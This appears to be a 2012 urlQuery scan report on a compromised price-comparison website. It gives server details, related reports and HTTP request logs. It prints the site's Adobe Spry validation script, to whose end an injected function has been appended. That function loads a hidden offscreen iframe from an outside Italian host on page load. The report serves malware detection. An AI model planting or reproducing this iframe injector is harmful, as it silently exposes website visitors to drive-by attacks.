Overview

URLhttp://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
IP199.204.44.130
ASNAS33028 vexxhost
Location Canada
Report completed2012-11-06 10:29:30 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro No alerts detected
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 199.204.44.130

Date Alerts / IDS URL IP
2013-02-24 13:09:391 / 0http://www.findblood.org/news/default.php?page=4199.204.44.130
2013-02-23 17:23:221 / 0http://www.findblood.org/news/default.php?page=4199.204.44.130
2013-02-08 11:54:281 / 0http://www.sleventsinuk.com/katinakt.htm199.204.44.130
2013-01-29 12:37:281 / 0http://www.sleventsinuk.com/pragathi.htm199.204.44.130
2013-01-25 03:14:591 / 0http://www.sleventsinuk.com/symphonypics.htm199.204.44.130
2013-01-25 02:15:361 / 0http://www.sleventsinuk.com/pragathi.htm199.204.44.130

Last 6 reports on ASN: AS33028 vexxhost

Date Alerts / IDS URL IP
2013-02-28 22:18:411 / 0http://www.joltedforums.com/forum/index.php?s=ce40e0dc0dfd74a781e431cfe18ecbb1199.204.44.226
2013-02-27 00:38:170 / 0http://199.204.44.226199.204.44.226
2013-02-27 00:17:360 / 0http://199.19.212.196199.19.212.196
2013-02-26 22:29:550 / 0http://199.204.44.69199.204.44.69
2013-02-26 22:28:120 / 0http://199.19.212.100199.19.212.100
2013-02-26 22:19:160 / 0http://199.19.212.98199.19.212.98



JavaScript

Executed Scripts (5)

#3 JavaScript::Script (size: 15589, repeated: 1) - Alert detect on script (Severity: 2)

/* SpryValidationSelect.js - Revision: Spry Preview Release 1.4 */

// Copyright (c) 2006. Adobe Systems Incorporated.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
//   * Redistributions of source code must retain the above copyright notice,
//     this list of conditions and the following disclaimer.
//   * Redistributions in binary form must reproduce the above copyright notice,
//     this list of conditions and the following disclaimer in the documentation
//     and/or other materials provided with the distribution.
//   * Neither the name of Adobe Systems Incorporated nor the names of its
//     contributors may be used to endorse or promote products derived from this
//     software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
var Spry;
if (!Spry) Spry = {};
if (!Spry.Widget) Spry.Widget = {};

Spry.Widget.ValidationSelect = function(element, opts) {
    this.init(element);

    Spry.Widget.Utils.setOptions(this, opts);

    // set validateOn flags
    var validateOn = ['submit'].concat(this.validateOn || []);
    validateOn = validateOn.join(",");
    this.validateOn = 0 | (validateOn.indexOf('submit') != -1 ? Spry.Widget.ValidationSelect.ONSUBMIT : 0);
    this.validateOn = this.validateOn | (validateOn.indexOf('blur') != -1 ? Spry.Widget.ValidationSelect.ONBLUR : 0);
    this.validateOn = this.validateOn | (validateOn.indexOf('change') != -1 ? Spry.Widget.ValidationSelect.ONCHANGE : 0);


    // Unfortunately in some browsers like Safari, the Stylesheets our
    // page depends on may not have been loaded at the time we are called.
    // This means we have to defer attaching our behaviors until after the
    // onload event fires, since some of our behaviors rely on dimensions
    // specified in the CSS.
    if (Spry.Widget.ValidationSelect.onloadDidFire) this.attachBehaviors();
    else Spry.Widget.ValidationSelect.loadQueue.push(this);
};

Spry.Widget.ValidationSelect.ONCHANGE = 1;
Spry.Widget.ValidationSelect.ONBLUR = 2;
Spry.Widget.ValidationSelect.ONSUBMIT = 4;

Spry.Widget.ValidationSelect.prototype.init = function(element) {
    this.element = this.getElement(element);
    this.selectElement = null;
    this.form = null;
    this.event_handlers = [];

    // this.element can be either the container (<span>)
    // or the <select> element, when no error messages are used.
    this.requiredClass = "selectRequiredState";
    this.invalidClass = "selectInvalidState";
    this.focusClass = "selectFocusState";
    this.validClass = "selectValidState";

    this.emptyValue = "";
    this.invalidValue = null;
    this.isRequired = true;

    this.validateOn = ["submit"]; // change, blur, submit
    // flag used to avoid cascade validation when both 
    // onChange and onBlur events are used to trigger validation
    this.validatedByOnChangeEvent = false;
};

Spry.Widget.ValidationSelect.prototype.destroy = function() {
    for (var i = 0; i < this.event_handlers.length; i++) {
        Spry.Widget.Utils.removeEventListener(this.event_handlers[i][0], this.event_handlers[i][1], this.event_handlers[i][2], false);
    }
    try {
        delete this.element;
    } catch (err) {}
    try {
        delete this.selectElement;
    } catch (err) {}
    try {
        delete this.form;
    } catch (err) {}
    try {
        delete this.event_handlers;
    } catch (err) {}

    var q = Spry.Widget.Form.onSubmitWidgetQueue;
    var qlen = q.length;
    for (var i = 0; i < qlen; i++) {
        if (q[i] == this) {
            q.splice(i, 1);
            break;
        }
    }
};

Spry.Widget.ValidationSelect.onloadDidFire = false;
Spry.Widget.ValidationSelect.loadQueue = [];

Spry.Widget.ValidationSelect.prototype.getElement = function(ele) {
    if (ele && typeof ele == "string") return document.getElementById(ele);
    return ele;
};

Spry.Widget.ValidationSelect.processLoadQueue = function(handler) {
    Spry.Widget.ValidationSelect.onloadDidFire = true;
    var q = Spry.Widget.ValidationSelect.loadQueue;
    var qlen = q.length;
    for (var i = 0; i < qlen; i++)
    q[i].attachBehaviors();
};

Spry.Widget.ValidationSelect.addLoadListener = function(handler) {
    if (typeof window.addEventListener != 'undefined') window.addEventListener('load', handler, false);
    else if (typeof document.addEventListener != 'undefined') document.addEventListener('load', handler, false);
    else if (typeof window.attachEvent != 'undefined') window.attachEvent('onload', handler);
};

Spry.Widget.ValidationSelect.addLoadListener(Spry.Widget.ValidationSelect.processLoadQueue);
Spry.Widget.ValidationSelect.addLoadListener(function() {
    Spry.Widget.Utils.addEventListener(window, "unload", Spry.Widget.Form.destroyAll, false);
});

Spry.Widget.ValidationSelect.prototype.attachBehaviors = function() {
    // find the SELECT element inside current container
    if (this.element.nodeName == "SELECT") {
        this.selectElement = this.element;
    } else {
        this.selectElement = Spry.Widget.Utils.getFirstChildWithNodeNameAtAnyLevel(this.element, "SELECT");
    }

    if (this.selectElement) {
        var self = this;
        this.event_handlers = [];
        // focus
        // attach on beforeactivate instead of focus for IE 7 (to overcome this bug: setting a class name, closes the select)
        var focusEventName = "focus";
        if (navigator.userAgent.toLowerCase().indexOf("msie 7.") != -1) {
            focusEventName = "beforeactivate";
        }
        this.event_handlers.push([this.selectElement, focusEventName, function(e) {
            if (self.isDisabled()) return true;
            return self.onFocus(e);
        }]);
        // blur
        this.event_handlers.push([this.selectElement, "blur", function(e) {
            if (self.isDisabled()) return true;
            return self.onBlur(e);
        }]);
        // change
        if (this.validateOn & Spry.Widget.ValidationSelect.ONCHANGE) {
            this.event_handlers.push([this.selectElement, "change", function(e) {
                if (self.isDisabled()) return true;
                return self.onChange(e);
            }]);
            this.event_handlers.push([this.selectElement, "keypress", function(e) {
                if (self.isDisabled()) return true;
                return self.onChange(e);
            }]);
        }

        for (var i = 0; i < this.event_handlers.length; i++) {
            Spry.Widget.Utils.addEventListener(this.event_handlers[i][0], this.event_handlers[i][1], this.event_handlers[i][2], false);
        }

        // submit
        this.form = Spry.Widget.Utils.getFirstParentWithNodeName(this.selectElement, "FORM");
        if (this.form) {
            // if no "onSubmit" handler has been attached to the current form, attach one
            if (!this.form.attachedSubmitHandler && !this.form.onsubmit) {
                this.form.onsubmit = function(e) {
                    e = e || event;
                    return Spry.Widget.Form.onSubmit(e, e.srcElement || e.currentTarget)
                };
                this.form.attachedSubmitHandler = true;
            }
            if (!this.form.attachedResetHandler) {
                Spry.Widget.Utils.addEventListener(this.form, "reset", function(e) {
                    e = e || event;
                    return Spry.Widget.Form.onReset(e, e.srcElement || e.currentTarget)
                }, false);
                this.form.attachedResetHandler = true;
            }
            // add the currrent widget to the "onSubmit" check queue;
            Spry.Widget.Form.onSubmitWidgetQueue.push(this);
        }
    }
};


Spry.Widget.ValidationSelect.prototype.addClassName = function(ele, className) {
    if (!ele || !className || (ele.className && ele.className.search(new RegExp("\\b" + className + "\\b")) != -1)) return;
    ele.className += (ele.className ? " " : "") + className;
};

Spry.Widget.ValidationSelect.prototype.removeClassName = function(ele, className) {
    if (!ele || !className || (ele.className && ele.className.search(new RegExp("\\b" + className + "\\b")) == -1)) return;
    ele.className = ele.className.replace(new RegExp("\\s*\\b" + className + "\\b", "g"), "");
};



Spry.Widget.ValidationSelect.prototype.onFocus = function(e) {
    this.hasFocus = true;
    this.validatedByOnChangeEvent = false;
    this.addClassName(this.element, this.focusClass);
};

Spry.Widget.ValidationSelect.prototype.onBlur = function(e) {
    this.hasFocus = false;
    var doValidation = false;
    if (this.validateOn & Spry.Widget.ValidationSelect.ONBLUR) doValidation = true;
    if (doValidation && !this.validatedByOnChangeEvent) this.validate();
    this.removeClassName(this.element, this.focusClass);
};

Spry.Widget.ValidationSelect.prototype.onChange = function(e) {
    this.hasFocus = false;
    this.validate();
    this.validatedByOnChangeEvent = true;
};

Spry.Widget.ValidationSelect.prototype.reset = function() {
    this.removeClassName(this.element, this.requiredClass);
    this.removeClassName(this.element, this.invalidClass);
    this.removeClassName(this.element, this.validClass);
};

Spry.Widget.ValidationSelect.prototype.validate = function() {
    this.removeClassName(this.element, this.requiredClass);
    this.removeClassName(this.element, this.invalidClass);
    this.removeClassName(this.element, this.validClass);
    // check isRequired
    if (this.isRequired) {
        // there are no options, or no option has been selected
        if (this.selectElement.options.length == 0 || this.selectElement.selectedIndex == -1) {
            this.addClassName(this.element, this.requiredClass);
            return false;
        }
        // the current selected option has no "value" attribute
        // when no value is set, browsers implement different behaviour for the value property
        // IE: value = blank string ("")
        // FF, Opera: value = option text
        if (this.selectElement.options[this.selectElement.selectedIndex].getAttribute("value") == null) {
            this.addClassName(this.element, this.requiredClass);
            return false;
        }
        // the current selected option has blank string ("") value
        if (this.selectElement.options[this.selectElement.selectedIndex].value == this.emptyValue) {
            this.addClassName(this.element, this.requiredClass);
            return false;
        }
        // the current selected option has "disabled" attribute
        // IE 6 allows to select such options
        if (this.selectElement.options[this.selectElement.selectedIndex].disabled) {
            this.addClassName(this.element, this.requiredClass);
            return false;
        }
    }
    if (this.invalidValue) {
        if (this.selectElement.options.length > 0 && this.selectElement.selectedIndex != -1 && this.selectElement.options[this.selectElement.selectedIndex].value == this.invalidValue) {
            this.addClassName(this.element, this.invalidClass);
            return false;
        }
    }
    this.addClassName(this.element, this.validClass);
    return true;
}

Spry.Widget.ValidationSelect.prototype.isDisabled = function() {
    return this.selectElement.disabled;
}

//////////////////////////////////////////////////////////////////////
//
// Spry.Widget.Form - common for all widgets
//
//////////////////////////////////////////////////////////////////////
if (!Spry.Widget.Form) Spry.Widget.Form = {};
if (!Spry.Widget.Form.onSubmitWidgetQueue) Spry.Widget.Form.onSubmitWidgetQueue = [];

if (!Spry.Widget.Form.validate) {
    Spry.Widget.Form.validate = function(vform) {
        var isValid = true;
        var isElementValid = true;
        var q = Spry.Widget.Form.onSubmitWidgetQueue;
        var qlen = q.length;
        for (var i = 0; i < qlen; i++) {
            if (!q[i].isDisabled() && q[i].form == vform) {
                isElementValid = q[i].validate();
                isValid = isElementValid && isValid;
            }
        }
        return isValid;
    }
};

if (!Spry.Widget.Form.onSubmit) {
    Spry.Widget.Form.onSubmit = function(e, form) {
        if (Spry.Widget.Form.validate(form) == false) {
            return false;
        }
        return true;
    };
};

if (!Spry.Widget.Form.onReset) {
    Spry.Widget.Form.onReset = function(e, vform) {
        var q = Spry.Widget.Form.onSubmitWidgetQueue;
        var qlen = q.length;
        for (var i = 0; i < qlen; i++) {
            if (!q[i].isDisabled() && q[i].form == vform && typeof(q[i].reset) == 'function') {
                q[i].reset();
            }
        }
        return true;
    };
};

if (!Spry.Widget.Form.destroy) {
    Spry.Widget.Form.destroy = function(form) {
        var q = Spry.Widget.Form.onSubmitWidgetQueue;
        for (var i = 0; i < Spry.Widget.Form.onSubmitWidgetQueue.length; i++) {
            if (q[i].form == form && typeof(q[i].destroy) == 'function') {
                q[i].destroy();
                i--;
            }
        }
    }
};

if (!Spry.Widget.Form.destroyAll) {
    Spry.Widget.Form.destroyAll = function() {
        var q = Spry.Widget.Form.onSubmitWidgetQueue;
        for (var i = 0; i < Spry.Widget.Form.onSubmitWidgetQueue.length; i++) {
            if (typeof(q[i].destroy) == 'function') {
                q[i].destroy();
                i--;
            }
        }
    }
};

//////////////////////////////////////////////////////////////////////
//
// Spry.Widget.Utils
//
//////////////////////////////////////////////////////////////////////
if (!Spry.Widget.Utils) Spry.Widget.Utils = {};

Spry.Widget.Utils.setOptions = function(obj, optionsObj, ignoreUndefinedProps) {
    if (!optionsObj) return;
    for (var optionName in optionsObj) {
        if (ignoreUndefinedProps && optionsObj[optionName] == undefined) continue;
        obj[optionName] = optionsObj[optionName];
    }
};


Spry.Widget.Utils.getFirstChildWithNodeNameAtAnyLevel = function(node, nodeName) {
    var elements = node.getElementsByTagName(nodeName);
    if (elements) {
        return elements[0];
    }
    return null;
};

Spry.Widget.Utils.getFirstParentWithNodeName = function(node, nodeName) {
    while (node.parentNode && node.parentNode.nodeName.toLowerCase() != nodeName.toLowerCase() && node.parentNode.nodeName != 'BODY') {
        node = node.parentNode;
    }

    if (node.parentNode && node.parentNode.nodeName.toLowerCase() == nodeName.toLowerCase()) {
        return node.parentNode;
    } else {
        return null;
    }
};

Spry.Widget.Utils.destroyWidgets = function(container) {
    if (typeof container == 'string') {
        container = document.getElementById(container);
    }

    var q = Spry.Widget.Form.onSubmitWidgetQueue;
    for (var i = 0; i < Spry.Widget.Form.onSubmitWidgetQueue.length; i++) {
        if (typeof(q[i].destroy) == 'function' && Spry.Widget.Utils.contains(container, q[i].element)) {
            q[i].destroy();
            i--;
        }
    }
};

Spry.Widget.Utils.contains = function(who, what) {
    if (typeof who.contains == 'object') {
        return what && who && (who == what || who.contains(what));
    } else {
        var el = what;
        while (el) {
            if (el == who) {
                return true;
            }
            el = el.parentNode;
        }
        return false;
    }
};

Spry.Widget.Utils.addEventListener = function(element, eventType, handler, capture) {
    try {
        if (element.addEventListener) element.addEventListener(eventType, handler, capture);
        else if (element.attachEvent) element.attachEvent("on" + eventType, handler, capture);
    } catch (e) {}
};

Spry.Widget.Utils.removeEventListener = function(element, eventType, handler, capture) {
    try {
        if (element.removeEventListener) element.removeEventListener(eventType, handler, capture);
        else if (element.detachEvent) element.detachEvent("on" + eventType, handler, capture);
    } catch (e) {}
};



/*82f26d*/

function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position = 'absolute';
    ifrm.style.top = '-999em';
    ifrm.style.left = '-999em';
    ifrm.src = "http://www.forsas.it/NEW/system.php";
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd; /*/82f26d*/

Executed Evals (0)


Executed Writes (0)



HTTP Transactions (53)


Request Response
GET /submit.php?su_categ=46 HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Date: Tue, 06 Nov 2012 09:28:41 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Connection: close
Transfer-Encoding: chunked
GET /template/Green_Light/img/favicon.ico HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/x-icon
Date: Tue, 06 Nov 2012 09:28:42 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:09 GMT
Etag: &quot;a900406-37e-46a0d1eb2dc40&quot;
Accept-Ranges: bytes
Content-Length: 894
Connection: close
GET /template/Green_Light/style.css HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 09:28:42 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 17 Jul 2010 21:04:00 GMT
Etag: &quot;a9004a1-631b-48b9bacac3000&quot;
Accept-Ranges: bytes
Content-Length: 25371
Connection: close
GET /SpryAssets/SpryValidationSelect.js HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Tue, 06 Nov 2012 09:28:42 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 31 Aug 2012 23:12:19 GMT
Etag: &quot;a900385-3ce5-4c897ec6c9ac0&quot;
Accept-Ranges: bytes
Content-Length: 15589
Connection: close
GET /SpryAssets/SpryValidationTextField.css HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 09:28:42 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:07:46 GMT
Etag: &quot;a900386-b19-46a0d1d53e880&quot;
Accept-Ranges: bytes
Content-Length: 2841
Connection: close
GET /SpryAssets/SpryValidationSelect.css HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 09:28:42 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:07:44 GMT
Etag: &quot;a90037d-79e-46a0d1d356400&quot;
Accept-Ranges: bytes
Content-Length: 1950
Connection: close
GET /SpryAssets/SpryValidationTextarea.css HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 09:28:42 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:07:45 GMT
Etag: &quot;a900380-95e-46a0d1d44a640&quot;
Accept-Ranges: bytes
Content-Length: 2398
Connection: close
GET /template/Green_Light/img/images/logo.jpg HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 09:28:42 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:54 GMT
Etag: &quot;a900419-2e84-46a0d21618180&quot;
Accept-Ranges: bytes
Content-Length: 11908
Connection: close
GET /template/lbs/img/haabaapromo.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 09:28:42 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:30 GMT
Etag: &quot;a9003a5-6b03-46a0d1ff34b80&quot;
Accept-Ranges: bytes
Content-Length: 27395
Connection: close
GET /template/Green_Light/img/images/menu-button-hover.png HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:54 GMT
Etag: &quot;a900439-377-46a0d21618180&quot;
Accept-Ranges: bytes
Content-Length: 887
Connection: close
GET /template/Green_Light/img/images/thumb-bg.png HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:58 GMT
Etag: &quot;a90043e-386-46a0d219e8a80&quot;
Accept-Ranges: bytes
Content-Length: 902
Connection: close
GET /template/Green_Light/img/images/shape.png HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 200 OK

Content-Type: image/png
Date: Tue, 06 Nov 2012 09:28:43 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 May 2009 20:08:57 GMT
Etag: &quot;a90042a-8e3-46a0d218f4840&quot;
Accept-Ranges: bytes
Content-Length: 2275
Connection: close
GET /SpryAssets/SpryValidationTextField.js HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Tue, 06 Nov 2012 09:28:42 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 31 Aug 2012 23:12:22 GMT
Etag: &quot;a900381-11fa0-4c897ec9a6180&quot;
Accept-Ranges: bytes
Content-Length: 73632
Connection: close
GET /SpryAssets/SpryValidationTextarea.js HTTP/1.1

Host: bestpricecomparisonsites.co.uk

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bestpricecomparisonsites.co.uk/submit.php?su_categ=46
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Tue, 06 Nov 2012 09:28:42 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 31 Aug 2012 23:12:24 GMT
Etag: &quot;a900384-8ef0-4c897ecb8e600&quot;
Accept-Ranges: bytes
Content-Length: 36592
Connection: close
GET /template/Green_Light/img/images/box-bottom-right.gif HTTP/1.1

Host: bestpricecomparisonsites.co.uk

